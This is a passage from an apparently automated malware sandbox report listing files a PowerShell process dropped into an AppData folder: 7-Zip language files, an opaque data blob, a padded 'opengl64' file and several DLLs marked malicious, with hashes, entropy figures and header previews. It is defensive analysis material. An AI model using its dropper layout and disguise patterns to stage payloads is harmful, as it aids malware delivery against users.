                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Andrij Ilechko..; : Mokiy Mazaylo..; : Sergiy Gontaruk..; : Misha Padalka..; 15.02 : 2015-05-19 : Yurii Petrashko..;..;..;..;..;..;..0..7-Zip..Ukrainian..............401..OK...................&.....&....&....................&............440..... ... &........ ... ..&.............................&.. ........ .......&.. .......... .......&...................... ........, .. ....... ......... ........?..500..&......&.............&........&............&.............&..........540..&.................. .&.................. &.......&.............&................&...........&......... ........

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\unrar.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):311448
                                                                                                                                                          Entropy (8bit):6.60360129496697
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:e2Gk6wDaKov/5qrawOZI8uN0f/UVvN3MwdZFmiVFC+OEu:e2GkNo35qrawqmG/yM8PmiO+Ol
                                                                                                                                                          MD5:851C9E8CE9F94457CC36B66678F52494
                                                                                                                                                          SHA1:40ABD38C4843CE33052916904C86DF8AAB1F1713
                                                                                                                                                          SHA-256:0891EDB0CC1C0208AF2E4BC65D6B5A7160642F89FD4B4DC321F79D2B5DFC2DCC
                                                                                                                                                          SHA-512:CDF62A7F7BB7A6D511555C492932E9BCF18183C64D4107CD836DE1741F41AC304BD6ED553FD868B442EAF5DA33198E4900E670CD5AE180D534D2BD56B42D6664
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[S8D:=kD:=kD:=k..kN:=k..k::=k..k\:=k.A9jU:=k.A>j\:=kMB.kE:=k.A8ji:=kMB.kK:=kD:<k.:=k.A8jt:=k.A=jE:=k.A.kE:=kD:.kE:=k.A?jE:=kRichD:=k................PE..L...r.@f...........!...!.....H...............................................@.......Q....@A........................0a..p....b..x........................(.......!...<..T....................=......0<..@............... ............................text............................... ..`.rdata.............................@..@.data.......p.......^..............@....rsrc................p..............@..@.reloc...!......."...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\uz-cyrl.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15167
                                                                                                                                                          Entropy (8bit):4.352884960736366
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:i7ggZifEX14nReON0sutg2s/Vk/A/n/pPqS:cYEF4nReON0sutg2suY/YS
                                                                                                                                                          MD5:7AFEDBD6E9EF3A4A2A99BC1BCB133605
                                                                                                                                                          SHA1:317D758DD9F65A6E320A4D45776A21ECB2AD60CC
                                                                                                                                                          SHA-256:2DD421A44AD779D961C951F01E7ABF4AC358C61CE26EA8311A0C902B4FC77CA3
                                                                                                                                                          SHA-512:48650BC3AC6C316AD6431B9DB3E49D76FD066F976FDD949A8DFDB194775B0E1C6EDA5ED99D2574C9D3C2781C6138E3BB3939C294894443EEC981C78377823AF5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 20.02 : 2020-10-21 : Shamsiddinov Zafar..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Uzbek-Cyrillic...........401........... ..............&....&.....&................&..... .......440........ &.......... &..........................&.......&..... ......&..... ............. .............. ..........?..500..&......&.............&.........&..............&..........&.......540..&.......&........ .......&......... .......&.........&.............&..... ..........&.......... ...............&.......... .............&.... ..........&...... ...........&......... .................&.............&............... ................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\uz.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9383
                                                                                                                                                          Entropy (8bit):5.080725632797468
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ijX9l/0gt5MpHB8zNq+cwKp/avDFxCg8FTO/7yWyTHGw:ijX9l/0gt5wh8zNq+cBVavDFE3cTyWyZ
                                                                                                                                                          MD5:3035144EEA3A382E39541B218A5D813A
                                                                                                                                                          SHA1:EB7A2F6306F7D2DED4CC88FB4CAB0F65558DB8B0
                                                                                                                                                          SHA-256:A310044DBC86E2441F0D50BB7D7DADB9879359B0C6CEB1FAF413A0459E07045B
                                                                                                                                                          SHA-512:99D86146E0A6407F8D0FD7179061699BC82232E6A2427203A2951FEF9089572C9C4E29C8484910F672A31F98EF13B5F3A45D5786FB118701A5B908F8F85A5C6A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 20.02 : 2020-10-20 : Shamsiddinov Zafar..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Uzbek..O.zbekcha..401..OK..Bekor qilmoq........&Ha..&Yo.q..&Yopmoq..Ko.mak....&Davom etmoq..440..Bariga &ha..Bariga &yo.q..To.xtatmoq..Qaytadan..&Fonda..&Fonda emas..&Pauza qilmoq..Pauza qilindi..Bekor qilinsinmi?..500..&Fayl..&Tahrirlamoq..&Ko.rinish..&Tanlanganlar..&Jihozlar..&Ko.mak..540..&Ochmoq..&Ichkarida ochmoq..&Tashqariga ochmoq..&Ko.rinish..&Tahrirlamoq..&Qayta nomlamoq..&Quyidagiga nusxalamoq.....&Quyidagiga ko.chirmoq.....&Olib tashlamoq..&Faylni bo.lmoq.....&Fayllarni birlashtirmoq.....&Xususiyatlar..&Sharh.....Yakuniy summa..Taqqoslamoq..Jild tuzmoq..Fayl tuzmoq..&Dasturdan chiqmoq..Havola..&Muqobil oqimlar..600..&Barini tanlamoq..Barini tanlamaslik..&Teskari tanlash..Tanlamoq.....Tanlamaslik.....Turi bo.yicha tanlamoq..Turi bo.yicha tanlamaslik..700..&Yirik ikonkalarda..&Kichik ikonkalarda..&Ro.yxatsimon..&Tafsilotli..730..Saralamaslik..Bejiri

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\va.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6549
                                                                                                                                                          Entropy (8bit):4.9932250796592506
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:icd/FL0HKwFgPqtXdN3K3TIcmqHfc39vNH:i65wCitzaj5E3P
                                                                                                                                                          MD5:639741F687D4427C9D3B170B1CED41A9
                                                                                                                                                          SHA1:AD3D3A09B8877381DF520E6EB654227DA045B89D
                                                                                                                                                          SHA-256:F43C31BD959A752EEFBB7C76ED918C4CACD50D43706121C55093D72A638FA7A5
                                                                                                                                                          SHA-512:EB63B0437624782D2BCD033905C7C0538902F9644E4FACDC52D094EDE5353309613B4EEF3CB437D4F69C2A4FD4B2E0F241990AAA3A38366685B10CABEC20A357
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4:26 : Tomas Miralles..; 4.44 : Fernando Verd...;..;..;..;..;..;..;..;..;..0..7-Zip..Valencian..Valenci...401..Acceptar..Cancel.lar........&Si..&No..Tan&car..Ajuda....&Continuar..440..Si a &tot..No a t&ot..Parar..Reiniciar..Segon pla..Primer pla..&Pausa..Parat..Est. segur que vol cancel.lar?..500..&Arxiu..&Editar..&Visualitzar..Favorits..Ferramentes..Ajuda..540..&Obrir..Obrir d&ins..Obrir fora..&Visualitzar..&Editar..Renom&enar..&Copiar a.....&Moure a.....&Suprimir..&Separar fitxer.....Com&binar fitxers.....P&ropietats..Come&ntari..Calcular checksum....Crear directori..Crear fitxer..Eixir..600..Seleccion&ar-ho tot..Deseleccionar-ho tot..&Invertir selecci...Seleccionar.....No seleccionar.....Seleccionar per tipus..No seleccionar per tipus..700..Icones g&rans..Icones menudes..&Llista..&Detalls..730..No ordenat..Vista plana..&2 Taules..&Barres de ferramentes..Obrir directori arrel..Directori pare..Historial de carpetes.....Actualitza&r..750..Arxiu..Est.ndar

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\vi.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8515
                                                                                                                                                          Entropy (8bit):5.3853389717622
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iJg8VLjw6yLuVSjHohWCOMF65E0QS3CmJdH:iJg8VfVcHpN5/CA
                                                                                                                                                          MD5:044531D134ACA40D5E57CC0AB96B4940
                                                                                                                                                          SHA1:988AA2BB6922360C1977B97725175613266242D2
                                                                                                                                                          SHA-256:3A6DCA3E1B5C8190C81FC859B5BE83EAF54EFDCAA148F4374D1225381083406F
                                                                                                                                                          SHA-512:458A86EA6468E8B1C9CC98A7A579F74854A34F101EC2EDE3AB48DD7DFBBF75EEAE184C5A23443B3CCC69B8C06E0E09EF2DF04D9F00D86CE99B82E785F95B7635
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 2.30 : : Tran Hong Ha..; 4.42 : : Le Vu Hoang..; 4.48 : : Nguyen Hong Quan..; 9.07 : 2011-04-12 : Vietnamize Team..;..;..;..;..;..;..;..0..7-Zip..Vietnamese..Ti.ng Vi.t..401....ng ...H.y b.........C...Kh.ng....ng..Gi.p ......Ti.p t.c..440..C. t.t c...Kh.ng t.t c...D.ng..L.m l.i..Ch.y n.n..Ch. .. .u ti.n..D.ng.... d.ng..B.n ch.c ch.n mu.n h.y b.?..500..T.p tin..Bi.n t.p..Xem...a th.ch..C.ng c...Gi.p ....540..M...M. t.i ..y..M. trong c.a s. kh.c..Xem..Bi.n t.p....i t.n..Sao ch.p ..n.....Di chuy.n ..n.....Xo...Chia c.t t.p n.n.....N.i t.p n.n.....Thu.c t.nh..Ch. th.ch..T.nh checksum (md5)..So s.nh..T.o th. m.c..T.o t.p n.n..Tho.t..600..Ch.n t.t c...B. ch.n t.t c.....o l.a ch.n..Ch.n.....B. ch.n.....Ch.n theo lo.i..B. ch.n theo lo.i..700..Bi.u t..ng

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\yo.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11044
                                                                                                                                                          Entropy (8bit):5.298636168430069
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7XgmEsBVCxtNc/EcoGFGDbMOw3WmkmSAGplG0v6k6P89Y6QVkixHxXUE4zVG9uRt:7XgECxuGbMO3/J3PL9zyezVGw5
                                                                                                                                                          MD5:698AF9267C08D61B712417491DA6A3BB
                                                                                                                                                          SHA1:01F21CE60E571699B006098AFE9520C02D4E11DC
                                                                                                                                                          SHA-256:FFAB6B91FFD2D3C2B1F7F431B47F7D28AA17A11587B876565613BB26C173402B
                                                                                                                                                          SHA-512:D37F63D3824D12D9BD4749EA94FCE924F3A5469874D6777261F0570A2A7EF28574825FAE199408C0E1EEE7061B08C447DA8744A1C2FA486981165AB5062FC8A9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 15.00 : 2015-03-29 : Ibrahim Oyekan..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Yoruba..Yoruba..401..O DAA..Pa re........&B..ni..&B..k...&P.d....r.nl.w.....&T..-s.w.j...440..B..ni fun &gbogbo ...B..k. fun &gbogbo ...D.r.....t.nb..r.. ..&...h.n-.gb.h.n..&Oj.-.gb.h.n..&D.d.r....d.r....e . d.j. pe .nyin f.. paar...500..&Fa.li..&Tunk...&.w...&A.y...&Irin... ..&.r.nl.w...540..&.i...i &si .n....i &si .ta..&.w...&Tunk...&Tun oruk. k...&...d. si.....&Gb. si.....&Paar...&P.n fa.li....... .w.n fa.li k.p.......&.b.d...&.r. .w.ye......e i.iro checksum...y.t....D. .p. fa.li sil.. ..D. fa.li sil.. ..&P.d....t..kas. ..&Yiyan agbara d.t...600.....y.n &gbogbo fa.li..Paa ...y.n gbogbo fa.li..&Yi ...y.n Pad......y.n.....Paa ...y.n........y.n bi ir. fa.li..Paa ...y.n bi ir. fa.li

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\zh-cn.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7973
                                                                                                                                                          Entropy (8bit):5.983862504991157
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7f+OUNnnvU5RLUvMyUxupow69yJ1L8ln9K4zy4VCrcj+v67DAT21ph4LiD:72rnnvU5R+yJ1MglEyycWV2DATk4LiD
                                                                                                                                                          MD5:0AAE98F500CE669DA6A4FCC33AEA04E9
                                                                                                                                                          SHA1:9326F529B796BCA164835FB1EB4E135F01CB61AF
                                                                                                                                                          SHA-256:7CF13E7434E6C062A29B964C026B2F66E75ECF541228665BF0C826EF7C0FE133
                                                                                                                                                          SHA-512:FC64FB4C2DF2B99F3D24CD938F4F381ACC20547BA655FB34016A1A1F860E0D8A99C087B24FDC160D2BD1DAD1F04C9EBBA682ADDE0E0004E0B64D774BD3F3550F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 2.30 : 2002-09-07 : Modern Tiger, kaZek, Hutu Li..; 3.08 : 2003-08-29 : Tunghsiao Liu..; 21.03 : 2021-07-21 : Tunghsiao Liu..;..;..;..;..;..;..;..;..0..7-Zip..Chinese Simplified........401.................(&Y)...(&N)....(&C)..........(&C)..440....(&A)....(&L)..............(&B)....(&F)....(&P).................500....(&F)....(&E)....(&V)....(&A)....(&T)....(&H)..540....(&O)........(&I)........(&U)....(&V)....(&E).....(&M).....(&C)........(&M).......(&D)......(&S).........(&B).......(&R)....(&N).............................(&X)...........(&A)..600....(&A)..........(&I)..........................................700.....(&G).....(&M)....(&L)....

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\zh-tw.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8058
                                                                                                                                                          Entropy (8bit):6.010295819104829
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i965RTllmRwM4cO+VnoF0HDczLXO7AJ8YRcaBxU+G9dDRI:i9MRTPUZO+VaoDcmRYUhXRI
                                                                                                                                                          MD5:ACFC57DE6B0E4489287BDAFE2062409A
                                                                                                                                                          SHA1:DBF62F8C6DD239AA16BFD62500517B849ED8E5B4
                                                                                                                                                          SHA-256:37C79297F8D4E491D681B556C23D957BC830068AE1D5F4535FD054C2233F3474
                                                                                                                                                          SHA-512:50A76A2C5A61056B2B9EFAF143335D86C5882D97C9D42ACF29CA87CD39D79876D561EC0FE83FB377E25379CFEBF593B782ECD8613D2A84AC33CBB6D8314481F1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.59 : Leon Tseng, sec2, ....; 9.07 - 15.00 : Jack Pang : http://www.developershome.com/7-zip/..;..;..;..;..;..;..;..;..;..0..7-Zip..Chinese Traditional........401.................(&Y)...(&N)....(&C)..........(&C)..440......(&A)......(&L)................(&B)......(&F)....(&P).............?..500....(&F)....(&E)....(&V)......(&A)....(&T)....(&H)..540....(&O).......(&I).......(&U)....(&V)....(&E)......(&M).....(&C)........(&M).......(&D)......(&S).........(&B).......(&R)....(&N)..............................(&X)...........(&A)..600....(&A)...........(&I).................................700.....(&G).....(&M)....(&L)......(&D)..730.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\acceptancy.svg

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):85309
                                                                                                                                                          Entropy (8bit):4.40078069686098
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:77eekfGGOl/TJGEFCxUZkmlhvaJ0eQ0NEwtQn3P:77/kl6/TJGUuUZ/kieQ0GwQ3P
                                                                                                                                                          MD5:9C93706B69D74E1581F72121B51BA165
                                                                                                                                                          SHA1:7FA9050B961309343CC7B928C5208B7590B6B1A7
                                                                                                                                                          SHA-256:C2EAE923EF7B68984AF9B76D81F53F9797D1BA56E361C6CEEC7728109D28B097
                                                                                                                                                          SHA-512:8DD402525EF0D2C093C09899471DB61507FE86CEF3A5C882668E6C8B55491217ECB3ACEA8A323E5AE796322B0F06411F58D47F375CDD773BC747D561659C08A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:..Dl.I.x....\d.O.f...pT.rA..h.Si..LQ.Ihu.C..D.b.QVv..p.k...RuY..J...jcZW.u.EGT..l.ZJ...UxI.......]\...Th.CI.aVhYR...[Z..v......Nh.]....Zc.eWD.W..Dfd...K...........E.sVudru...E...rRW..W.Z...g.[.......Y....g.rp..M..A..oVXPKVtv......Et..lt.I.w..wb.lD...Tid.j...]rK.oUS..`..N..q.Bm.oA....x....y.H.ULj...........o.J..CBm..C..im..\.[.D.lBk.].c.Y.u..w.t.......`tKd.R........._h...i.G.WGvH.....c`CZb..x.C..Us.....C....L.x..vu\Yv.[.t..R..wyo.E....j..bF\UJ.r......\.....Q....myp.b.....\P.X.....r......ko.OB.SC..o.s.Y..Gr..PV..r..l.rai]s.T....L.NRF]KE.....d`......l.X.trKrFs^....Q\..X..n..r...Y...b.kHi.P.n....xPT.v[Nn....]r^.x.[`waC.gZ.N..r.....aA..DrCU..x.J...m.^.`.....AC.xc.chJN.TbyT_o..cWP..D..K...J.F\.c...G..Q[.PD..o...vD.f...v.ixUW.M._...x...qr.qq]..ac...DSZqsa..FX.y.M..fSg..NX.M`F.X.r.sW.[l...Dl.I...yk.S`q.B^...El.m...nL..l.......p...........l.D.coxK...d.e..Hli....m.....SA...r.fgqh.[.ogjks[v.g...x....xN.g....r.Z...bX.O....].s..cZ..M`Ct.lo.....w.DS....rR.C..a.UJ.dg..r......XG[...inBxf.L.B....kp.]s.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\opengl64

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):187399968
                                                                                                                                                          Entropy (8bit):0.08844724852506093
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:oOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOe:3
                                                                                                                                                          MD5:483C78697433D273FE559708EFFBE3DF
                                                                                                                                                          SHA1:89B044BF2A6A57BC93DAEA55D871DB1DD99D0BD5
                                                                                                                                                          SHA-256:C79C4E7F57BFA69DAC2BDAF6B074F39B68CFFC801E361B5564295B393F7C9374
                                                                                                                                                          SHA-512:E78CB2B136FAE43D5810D410984940E6BB6EDF9405B22F1C4C6271D7DE15E77056828EF01294201DB99EDCE3728BB0A0DCEA3E4A9CF4FF5605459B5122EAF135
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1049.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):264504
                                                                                                                                                          Entropy (8bit):4.2616300266171105
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0AC98A4BFC717523E344010A42C2F4BA
                                                                                                                                                          SHA1:7967769EE63B28FC8BEC14854A4A0A71BDA6B3F2
                                                                                                                                                          SHA-256:68546336232AA2BE277711AFA7C1F08ECD5FCC92CC182F90459F0C61FB39507F
                                                                                                                                                          SHA-512:8A5F4F19C24C24A43D9D18A8935613AD6A031B8F33D582767A2407665F1FF39A403DDAEECBF4F22A58759FCD53F81F4392192CA9FA784FF098A6C995509F9547
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5Q..q0..q0..q0..eO~.p0..q0..p0..eO..p0..Richq0..........PE..L......d...........!...$............................................................./....@.......................................... .. ...............8)...........................................................................................rdata..............................@..@.rsrc... .... ......................@..@.......d........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .. +...rsrc$01.... K.......rsrc$02............................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1058.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):268600
                                                                                                                                                          Entropy (8bit):4.285774017645798
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:41C75E831A5571C3F72287794391A0E6
                                                                                                                                                          SHA1:0FE7A9A3C905D0376001A5C46EDFC0000FA82BD4
                                                                                                                                                          SHA-256:B3AD99AFDAEE3B9365E7A3FFCC44C2761E22A4F92DFF5E5EFDC52F6B08EA0105
                                                                                                                                                          SHA-512:D3D03F3308DB1862522127300127839AA44828D29622DB20AEA71E6A80A51247654E380D7A0126361D85774137826FC345AE368335BB1EA9C1C8995721DAF432
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5Q..q0..q0..q0..eO~.p0..q0..p0..eO..p0..Richq0..........PE..L......d...........!...$............................................................9.....@.......................................... ..................8)...........................................................................................rdata..............................@..@.rsrc........ ......................@..@.......d........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .. +...rsrc$01.... K.......rsrc$02............................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bpl

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1112040
                                                                                                                                                          Entropy (8bit):6.832491592471325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:ADF82ED333FB5567F8097C7235B0E17F
                                                                                                                                                          SHA1:E6CCAF016FC45EDCDADEB40DA64C207DDB33859F
                                                                                                                                                          SHA-256:D6DD7A4F46F2CFDE9C4EB9463B79D5FF90FC690DA14672BA1DA39708EE1B9B50
                                                                                                                                                          SHA-512:2253C7B51317A3B5734025B6C7639105DBC81C340703718D679A00C13D40DD74CCABA1F6D04B21EE440F19E82BA680AA4B2A6A75C618AED91BD85A132BE9FC92
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bpl, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......H...........................................P.........................`......U...........................................X$...p...................K......h.......................................................x............................text............................... ..`.itext........... .................. ..`.data...tw.......x..................@....bss.... T...@...........................idata..X$.......&..................@....edata...............D..............@..@.rdata...............&..............@..@.reloc..h............(..............@..B.rsrc........p......................@..@.............`......................@..@................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\trading_api64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):289568
                                                                                                                                                          Entropy (8bit):6.327940956070683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2BCA4E2C047EC969CB3CFF277E7FC184
                                                                                                                                                          SHA1:C4B5B00B605E59C6FDCB6731F2E53069506E287A
                                                                                                                                                          SHA-256:F1EB582E607A1E43CDB1654BFB7CB29AD46F6728B3FB89A14F7727E0E8DAAB69
                                                                                                                                                          SHA-512:3819178EC650298157B1D67317E0895CB92709B106D0D8525921E341EBA5E960F42434E010066BB405F1BA1619ADFF1A645EDE58E16C4B2D88DF2C90611A6CB5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@.......................................VLV......P... :].........!.l..._.. m:....CpL0f..41PC....1.....S7a.../....."....F..~........)...2R..@../..-....1..tP..JS.&...W|P..k+s..e.................................................................PE..d.... :].........." .....4..........$.........@;..........................................`........................................../..`.......P............`...#...P.. .......t...@...T.......................(....................P...............................text....3.......4.................. ..`.rdata......P.......8..............@..@.data....I..........................@....pdata...#...`...$..................@..@.rsrc................>..............@..@.reloc..t............F..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\tradingnetworkingsockets.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4249928
                                                                                                                                                          Entropy (8bit):6.705198671596974
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3CF26CE759C5E261FE3ECC6451B8B08E
                                                                                                                                                          SHA1:B5DA110034FE394A4020367404534903764473FE
                                                                                                                                                          SHA-256:FC4A65FF603BF1F4BFE323DE1866145AE1E006AA656799FD134DFA63D92D47C1
                                                                                                                                                          SHA-512:E7B543483F38BB6338490B5C8F5DA6F95E0D78B45F2B26D898CC3B58CF7C359952BFE413414CB6CD1532C3C6FD7A860026B2BEC7B6D0DDFBEE9A1385A62E14F2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...................................(...VLV.......@....b9S.....b1s..Q>.>..xD.E..4...p.=...0?.8O..H".Hu...P.z.v.T ^..Nb......$o..n.o....G......[....k9.ZgH.wq..r7.B..:.....p..Q.........................................................................................PE..d......b.........." .....T/...........,......................................pA.....}.A...`..........................................+=.(....1=.......@.x.....>.H.....@.H-....@.xy..xC:.T....................E:.(....C:.8............p/..............................text....S/......T/................. ..`.rdata.......p/......X/.............@..@.data...$`...P=......,=.............@....pdata..H.....>.......>.............@..@_RDATA........@......$@.............@..@.rsrc...x.....@......&@.............@..@.reloc..xy....@..z...2@.............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bpl

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2015208
                                                                                                                                                          Entropy (8bit):6.68071457498688
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A8638D9BCA7378BA33AD3E4F1555998D
